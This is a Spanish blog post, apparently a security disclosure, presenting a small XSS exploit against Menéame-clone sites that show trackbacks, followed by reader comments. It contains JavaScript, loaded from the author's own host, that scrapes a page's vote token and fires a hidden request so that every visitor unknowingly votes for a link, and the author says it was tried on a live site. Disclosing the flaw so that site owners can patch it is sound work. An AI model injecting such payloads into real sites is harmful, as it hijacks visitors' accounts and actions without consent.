Finalmente, presento un pequeño exploit que hice para aprovechar la falla comentada en anteriores posts. Lo que hace el exploit es enviar un "ataque" XSS para que el script http://test.buayacorp.com/s.js cargue en la página afectada.
var doc = document.body.innerHTML;
var match = /menealo\((\d+),(\d+),\2,'([^']+)'\)/.exec(doc);
if (match != null && match.length == 4) {
var img = '<img src="/backend/menealo.php?user=' + match[1] + '&id=' + match[2] + '&md5=' + match[3] + '" style="display:none" />';
document.write(img);
}
}
Pueden ver el caso de prueba en floreame, a quienes de antemano pido disculpas por las molestias causadas y sugiero que actualizen a la última versión de el script para solucionar esto. Cada vez que entren en esta dirección, automáticamente estarán meneando el enlace enviado.
Código fuente: http.zip
Disclaimer: Este exploit ha sido publicado con el fin de que los pocos lectores de este sitio ayuden en cierta medida a que los responsables de los diferentes clones de Menéame que muestren el listado de trackbacks, puedan corregir la falla descrita en posts anteriores.
4 replies on “Importancia de la validación de datos – Demostración”
Sano???? ke hablas men.... me da curiosidad alguien ke habla de programacion... opte por wordpress ... si sabes tanto de programacion por ke no haces un blog tu mismo... :D...
tons que haces comentando en un blog con wordpress, deberias estar comentando en slashdot o barrapunto, troll!!
Actulizado Floréame. Se agradece el consejo.
hola! lo que necesito es que son validacion de datos